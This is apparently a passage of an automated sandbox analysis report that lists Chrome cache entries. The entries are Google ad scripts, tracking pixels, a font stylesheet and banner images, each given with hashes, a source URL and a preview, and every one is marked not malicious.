SHA1:	A81311F7FCFA9B6B23A24D4E5C976D5F75B1B9B7
SHA-256:	18088C10E79C926292732AF98A0CE470E90F3FBCBA4BB4896AB3310C2D94E421
SHA-512:	A07961EB39C4CD4E39EE19E2C675E64E5BA5367DAA18E2F76A23772ABD62F46B002E6BE8FB0F35A70616941178FACC8DF579C4A68E5811B74313C12806AAFAE3
Malicious:	false
Reputation:	unknown
URL:	https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Preview:	<!DOCTYPE HTML PUBLIC>.<html>. <head>. <meta http-equiv="refresh" content="0;url=https://www.google.com/pagead/drt/ui" />. </head>.</html>

Chrome Cache Entry: 366

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2215)
Category:	downloaded
Size (bytes):	73462
Entropy (8bit):	5.57095285315376
Encrypted:	false
SSDEEP:	1536:d35XMc5e67JVx8o8oLLu5bl9OvrikspReTHFr:LXMUHx8voLLuwv+8Tlr
MD5:	52115DA0CE96AB15F860F540B34D53E5
SHA1:	5BB986DF09286B693A6B550939F2C7F17C4607EF
SHA-256:	FABE7C151E62346D0D24F7F0A449EC8971866CC72BDC89B4680A9C4C2436BCF6
SHA-512:	356DF7B90F5D5DCAE06B4A166B5F5125EC09874A32CDBDFCE46A7D654EE0F9E9BC5365108F41714E07F1E7DA1AB9D1CB370BB1C4369526CF4A608675F2EFC378
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/js/rum.js?fcd=true
Preview:	(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",p={},fa={};function r(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function t(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var d=e[0],f;!a&&d in p?f=p:f=da;for(d=0;d<e.length-1;d++){var h=e[d];if(!(h in f))break a;f=f[h]}e=e[e.length-1];c=ea&&c==="es6"?f[e]:null;b=b(c);b!=null&&(a?ba(p,e,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[e]==

Chrome Cache Entry: 367

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	"https://cm.g.doubleclick.net/pixel?google_nid=dotomi&google_ula=17128,0&google_hm=AQAJ-lkVU1W0hQJo-pTeAQEBAQEBAQCT4szroQEBAJPizOuh&expiration=1730485175&google_cver=1&is_secure=true&google_gid=CAESELcE1xY_P2iAz02Q_GLNh6I&google_push=AXcoOmQcX_cAZ4zn4u4CQcvLA19Qq3ikQJjMbo8ApBb1bmtB_Wel14jpY5uMt8xKtV9rtaulhtBwZBXT3qIbVpCcFcwZ39N_LMExmg"
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 368

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	42251
Entropy (8bit):	7.951768521989965
Encrypted:	false
SSDEEP:	768:+JpQfb72PXOQ11kDIbUAE9T6IH7L1dNZiA6/icH8ptiay:+Kbm0DIPE92IbL1PQZcpW
MD5:	EF3F0CA25DE1F5F3BD96A74B1C172D84
SHA1:	127E9ED66FC8EF63DB4B813B50BC7F3ADC3EFB93
SHA-256:	E67D373F58E4CE21BA50E28CB693009364D400F7F85C5472C76BA7AC2CBDF726
SHA-512:	3BF72370C4ED45B588C92AB243626987660D3B3A0AE5079038E72D8B9C9ECF7BEB7339565388900348BCD7EED4AF63C7E27DEEF10123895D45DA8F1F3B33ED11
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......t.....5V*e....PLTE..............................................................i..r..........}..f......Y..............`....!g..r..........2.........l.............p.K...n..[..R..x.....b.~..O...U..}..x..^..\..s........j..z..T..e..\........I.v.........b....T..Z...s.^..l.........U....._....3.....t..l.._..0\|.}......f..I..:.....l..E.......9..b..?u..R....._.........\|...........x.]..k.......z..]..b......u.r1.. .IDATx....6..-."...(ucI.%.%EL.Y....o[7v...g..........?..9.H..%J.-'>....-. H\|yppp..H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..

Chrome Cache Entry: 369

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2200)
Category:	dropped
Size (bytes):	23701
Entropy (8bit):	5.499820432715541
Encrypted:	false
SSDEEP:	384:PqTcq08AdYSAwhImk7eDivZSPoa5LjcOuq37BroWaIOXXhwpuy4yDCWyj/1gVfj5:Pqr0VdYSAX7ecMPoaNQOHdUWaIOX277t
MD5:	8E928C4BDDE1C53A613B419348556184
SHA1:	B08CB2310F2B4BC7EC489014E2F041A1AD7A5FBB
SHA-256:	D83AFDD078C43825E5173918368CE83C62082C7D10408D0B2D788B5B60CF0E2A
SHA-512:	49EA93EF9F60712DAC6610CCFDF19E48911266767F732F8B5A615326D29346B5C9E19B040E7CBBEB38A5A08DFDB76EEC86A4108C553BABD9E909245E851D619B
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData\|\|null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")\|\|t("CriOS"))&&!(u()?0:t("Edge"))\|\|t("Silk")};function ka(a){ka[" "](a);return a}ka[" "]=function(){};!t("Android")\|\|ja();ja();t("Safari")&&(ja()\|\|(u()?0:t("Coast"))\|\|(u()?0:t("Opera"))\|\|(u()?0:t("Edge"))\|\|(u()?ia("Microsoft Edge"):t("Edg/"))\|\|u()&&ia("Opera"));let la;function ma(){const a=Error();a.__closure__error__context__98438

Chrome Cache Entry: 370

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (53532)
Category:	downloaded
Size (bytes):	54834
Entropy (8bit):	5.740081137579064
Encrypted:	false
SSDEEP:	1536:jUyWUyt97qCrIvv4FMhrVXDI83LrarvpqJEgS5q:ty/7HrIuMf1eHgSE
MD5:	269A8475DF1658DAFB5E7AF2ED64D1A0
SHA1:	94BF6E3381E26A74E71107360F1B190614DB6D3E
SHA-256:	2CA3554C20669BC2CE34C005878BD96932244CABEBC3D3427066C6241C5B8C4F
SHA-512:	BE7E11FBE9211CD33D2764749A3ADF9BD98DCD8F5BE3AC91361CA110C008A81080E4D83D9BE9FAAD3DB53679A1549B44DCAD7DB721A030879547850E6E2EB32A
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/bg/LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8.js
Preview:	//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function a(g){return g}var Y=function(g,K,b,w,t,M,B,N,R,E,u,Z){for(Z=(E=25,w);;)try{if(E==29)break;else if(E==K)E=l.console?0:g;else if(E==48)Z=b,N=R.createPolicy(t,{createHTML:Q,createScript:Q,createScriptURL:Q}),E=g;else if(E==18)Z=w,E=K;else if(E==0)l.console[B](u.message),E=g;else{if(E==g)return Z=w,N;if(E==84)E=R&&R.createPolicy?48:64;else if(E==25)N=M,R=l.trustedTypes,E=84;else if(E==64)return N}}catch(W){if(Z==w)throw W;Z==b&&(u=W,E=18)}},l=this\|\|self,Q=function(g){return a.call(this,g)};(0,eval)(function(g,K){return(K=Y(4,83,68,44,"bg",null,"error"))&&g.eval(K.createScript("1"))===1?function(b){return K.createScript(b)}:function(b){return""+b}}(l)(Array(Math.random()*7824\|0).join("\n")+['//# sourceMappingURL=data:application/

Chrome Cache Entry: 371

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=336FAC20C30146ADB0C6F6BCF75A840A&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 372

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	42
Entropy (8bit):	3.0241026136709444
Encrypted:	false
SSDEEP:	3:CUXPQEsJ+q:1QEsJ+q
MD5:	32023BB33CFB2A1990A4EF2D85B6AC16
SHA1:	23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
SHA-256:	99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
SHA-512:	D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
Malicious:	false
Reputation:	unknown
URL:	https://odr.mookie1.com/t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1
Preview:	GIF89a.............!.......,...........L.;

Chrome Cache Entry: 373

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	dropped
Size (bytes):	22560
Entropy (8bit):	5.532870375696404
Encrypted:	false
SSDEEP:	384:4qopQl6FtO53n+8svyfxNFo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qopQlwOFn+DiFoeeFqYt2TJisnC6ZcU
MD5:	975743BD0AB761EBED37DFDA7FE934E0
SHA1:	2F2F01248ABA0638DCACEA2081888CF598960991
SHA-256:	13F3174A49C97770522994A73451F71E77FDE2DC0E3DD7F965E73929C018888D
SHA-512:	D4B8D5AA631568F43546D82324DF07B6F33112FF7A0DF1930904B2773BD7B478A05720C5CB39AB52B396559C3C8D65BC5FAB2065067DC2DBC9B72245D8ABB495
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this\|\|self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr

Chrome Cache Entry: 374

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 375

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3580)
Category:	dropped
Size (bytes):	16784
Entropy (8bit):	5.497019767420942
Encrypted:	false
SSDEEP:	384:LQZaeg6HPkyUQJqqz1pBjL5xz9yAFxUC8rJUrWUK2FZcSX1FsS:LQZa/6vDUQJTN35xhyAsflDUKgySlFsS
MD5:	DFDEDC6628AFFA8FAC2AA99A7F72586B
SHA1:	475F9A991D894B488CD51D62861E29197C4F8C94
SHA-256:	6A80E6F326931D8BE3BCE35187BDE97DE515207B248340C7E83EDCF4E9BA2051
SHA-512:	90B14F87535EF691199DCFDDA082A51F6B000245F7FEE20EFCEC7D42C3F267678E953C024C7A57BA90B1444B32EEB105331100D7A277496FF976FF8CF34ED4FF
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function ea(a){m.setTimeout(()=>{throw a;},0)};var p,q;a:{for(var fa=["CLOSURE_FLAGS"],r=m,t=0;t<fa.length;t++)if(r=r[fa[t]],r==null){q=null;break

Chrome Cache Entry: 376

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 377

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1572)
Category:	downloaded
Size (bytes):	20471
Entropy (8bit):	5.584304156248125
Encrypted:	false
SSDEEP:	192:o6sQyrXBJF3Phi+RYohDPCx+bbqGIwVjA2K6qwLdrdXQ1rsOWC3kuixejzuDkF+S:0571qYvUBMLqY0b
MD5:	41004A20C7E924677BE5801EF1E6EF09
SHA1:	B6E8C17BD17B38A262254E7AFD529DA3695B47E1
SHA-256:	7D219CEA3316552D5927B5B7528F1192223374DD1B9DD58C48E5DE057AF6E3F1
SHA-512:	3005AC96EBF9F1E876031E63282029C3B1653CC7110BBDE5C380DBCAB54BD272F6DD5C8A74D44145F8F47F175F4B3CAF6944DFE79921B7F0F333AB24D2097D38
Malicious:	false
Reputation:	unknown
URL:	https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500
Preview:	/. See: https://fonts.google.com/license/googlerestricted. /./ armenian /.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./ bengali /.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./ canadian-aboriginal */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rl

Chrome Cache Entry: 378

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2775)
Category:	dropped
Size (bytes):	93273
Entropy (8bit):	5.58456780007395
Encrypted:	false
SSDEEP:	1536:Xg80TNpmPCqiB3c+G5CSJ7FyCSzGWKZtO6Lz3FIk4K9SCeIzkDjtRbXQjzJIn+QY:XbqpmPCqU3cFTxyCSzGW7XFCeI4DjtN4
MD5:	2644DCEA2BDAB8942D3BF08430F665C1
SHA1:	88E8B0588F61561C82465C5F085E9E6D8C205BA0
SHA-256:	A3724961B5600222B4CA071C334440649D11DC7319CBF9FC8CF27564BE868926
SHA-512:	ADB3F309073879B3FB935A572CCDD25AE344F1A3A127B280E3BA9E2C4C48C2BC246B5FEB3665796FEB415E5BECE9B142B870209EF5E98948146EA6160179FB2F
Malicious:	false
Reputation:	unknown
Preview:	(function(sttc){'use strict';var ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ea=da(this),fa=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ha={},ia={};function ja(a,b,c){if(!c\|\|a!=null){c=ia[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ka(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ha?f=ha:f=ea;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=fa&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ca(ha,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ia[d]===void 0&&(a=Math.random()*1E9>>>0,ia[d]=fa?ea.Symbol(d):"$jscp$"+a+"$"

Chrome Cache Entry: 379

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 600 x 314, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	12704
Entropy (8bit):	7.940138947736875
Encrypted:	false
SSDEEP:	384:S0SLNpV4j/EFBFYKDBttiwzbzX9nio92AN:AtW8FjtzzbL9iqF
MD5:	2D1055984E8C78EDDA088AB44B229469
SHA1:	7A8405751CCDD9BF68143E1C52ECD1BE5DC84275
SHA-256:	BFA18BE2B49E5A3A6C6F96754A2024F6D6536CAB05EE58EEBF473D09FE24C29D
SHA-512:	D70E6875E9DED81295DCE58D0ED66859130D7E65645E8F93CB685BD08FF508D53B6C722B9421871D77BED90E1F359B37446404494062266D609C2E25022B6E28
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...X...:......l."....PLTE.l.....k..m.....j.....h.....f.....l..a..e..j..m..^.By..H~.Cwl........P........]..S..Ez.T..N..a.....G.~......_..W..\........O..Bw............v....'y.C..m....&c.%].[..........'v.X..Xw.Ah.\|....(q....Br.~..[..k.......X..'X....B....\|..y..l.....V..}..Zz....... .IDATx..}......4.F..../!q.BBJ.Z..............,3..+$}...~.!l^$..s.M./.8.....\|..b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p..bi.........#.J......&Z%.~\..^..@`."9b_wBC.Kh#V.wB.e....5...V;EZ.ET............4&....pR..@.....M.%~3..C.zv.xAP.J hA.. 8}V3.Zb.Y......... ....P.\|..273.....# V.....</..........k........Z...$.b.n.u2m.-..=..W..!..i..X....B......._..uR..r._.Tu.o.n@.*.#W}....Y...kS.....W.u@........\|^.V}........v.+P...7D .....K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.

Chrome Cache Entry: 380

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (634)
Category:	downloaded
Size (bytes):	1174
Entropy (8bit):	5.74166936214599
Encrypted:	false
SSDEEP:	24:hY6t2eJJBewfHDdUg8EcvjHODQMJXeK+C6uS/MLmeK+C6uSGymWAuDSXeMzCUtVv:9V4goLHODS1CTXT1CTVyPyCM6Nu
MD5:	2FE2B1F17888E326B010A8CDA72D48D3
SHA1:	59CBBEEDE4C472024C482BAE8529144119BBBD27
SHA-256:	9A9B7FB32E01FD70747F32EFDBD0472FD681C85EEBB0C42D10C7A514820A0062
SHA-512:	30BE2E73020EB97A67709E47DED40E999D352DA9B94EDD946D1315BDA65AD616AAA3CDFCFA675D061E4ED4AE1BAE3F0D245908D44411B2425C49B4345D2F6607
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html
Preview:	<!DOCTYPE html>.<html>.<head>. <title></title>. <script type="text/javascript">(function(){var f=null,g=null;function l(a){var b="";n(a,function(a){b+=String.fromCharCode(a)});return b}function n(a,b){function c(b){for(;e<a.length;){var c=a.charAt(e++),d=g[c];if(null!=d)return d;if(!/^[\s\xa0]*$/.test(c))throw Error("Unknown base64 encoding at char: "+c);}return b}p();for(var e=0;;){var d=c(-1),m=c(0),h=c(64),k=c(64);if(64===k&&-1===d)break;b(d<<2\|m>>4);64!=h&&(b(m<<4&240\|h>>2),64!=k&&b(h<<6&192\|k))}}.function p(){if(!f){f={};g={};for(var a=0;65>a;a++)f[a]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(a),g[f[a]]=a,62<=a&&(g["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.".charAt(a)]=a)}};function q(){for(var a=window.location.hash.substring(1).split(","),b=0;b<a.length;b++){var c=l(a[b]),e=window;e.google_image_requests\|\|(e.google_image_requests=[]);var d=e.document.createElement("img");d.src=c;e.google_image_requests.push(d)}}var r=!1;

Chrome Cache Entry: 381

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 728 x 90, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	6903
Entropy (8bit):	7.777210754393487
Encrypted:	false
SSDEEP:	96:30eNlhZHntC09e9qBRdjvmTSP4t++XrO2wXQ0RjBfv5oEIdJ+G/IGQL38l66hNyI:7NvZHtPziu4EEpPqVo52L31p2/5tig
MD5:	CF4B5E15C04BB2DF72FDE2DF1C2F923D
SHA1:	E59FC7341473D3FAABBFAF63EEB9CA1D188B2D13
SHA-256:	2FE00C96B722401ECFA65A37FD463901DC91CCCCB4B789CE8D6EE0AA5073A2AF
SHA-512:	0BD9F95865D43093D9570AAFA7147E65020CC2939733CC59FA9A68FF6127C012DEFCBA0F340E44C76CEB545A0995D9D4D8C833F026216FC188394C4ADF963609
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......Z.............PLTE"..!.."..$.....A.0.........,..$..".....%........-..+../..!..-..#..2..)........(......../........&...........,.................3..5..S.D................0.........................&................[.L.................(........<.)......x.k.......................................>.,......7.#......$..5.!.............................9.&.........H.86.".......v.........?.,a.S..........{.....L.;...,.....).....h.[n._......L.;......C.2......A.2K.;....p._...g.X%..O.?...0....vl.[...rP.?t.f.....s-..C.2#..<.''.....E.3........y.h...G.9..z.j.....G.4.....q.^=.(...2..X.H...^.L..k.]A.......q..a.Pvvv...l.^n.`g.WR.=@.+9.&V.Ff.U\.IH.4Q.>...A.//.............yL.?...T.Ez.r..R.A3..e.OW.F...M.9t.d.....].Pt.iw.k...E.0............T.Ek.a~.p.....1.............zTXtRaw profile type APP1....m.A..0...~E......7u.HU[.....Rb+{..!X.\|...o...i......2.)hP....2....zl.U.......c.s.^.=..u7.Y%A8}d.ux.H{.......*^..7 ..v..g...S......o.].....p.Q..>n

Chrome Cache Entry: 382

Download File

